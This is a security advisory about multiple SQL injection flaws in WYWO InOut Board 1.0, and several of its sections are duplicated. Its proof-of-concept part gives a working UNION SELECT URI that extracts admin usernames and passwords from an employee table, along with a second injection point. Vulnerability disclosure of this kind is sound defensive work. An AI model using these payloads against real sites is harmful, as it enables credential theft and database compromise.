WYWO InOut Board Multiple SQL Injection Vulnerabilities
BID:21803
Info
WYWO InOut Board Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 21803 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 28 2006 12:00AM |
| Updated: | Jan 04 2007 06:27PM |
| Credit: | ajann is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Cybercoded WYWO - InOut Board 1.0 |
| Not Vulnerable: | |
Discussion
WYWO InOut Board Multiple SQL Injection Vulnerabilities
WYWO InOut Board is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
These issues affect version 1.0; other versions may also be vulnerable.
WYWO InOut Board is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
These issues affect version 1.0; other versions may also be vulnerable.
Exploit / POC
WYWO InOut Board Multiple SQL Injection Vulnerabilities
Attackers can exploit this issue via a web client.
The following sample URIs are available:
http://www.example.com/phonemessage.asp?num=-1%20union%20select%200,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20employee%20where%20Admin='Yes'
http://www.example.com/[path]//faqDsp.asp?catcode=[SQL]
Attackers can exploit this issue via a web client.
The following sample URIs are available:
http://www.example.com/phonemessage.asp?num=-1%20union%20select%200,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20employee%20where%20Admin='Yes'
http://www.example.com/[path]//faqDsp.asp?catcode=[SQL]
Solution / Fix
WYWO InOut Board Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
WYWO InOut Board Multiple SQL Injection Vulnerabilities
References:
References:
- WYWO InOut Board Web Site (Cybercoded)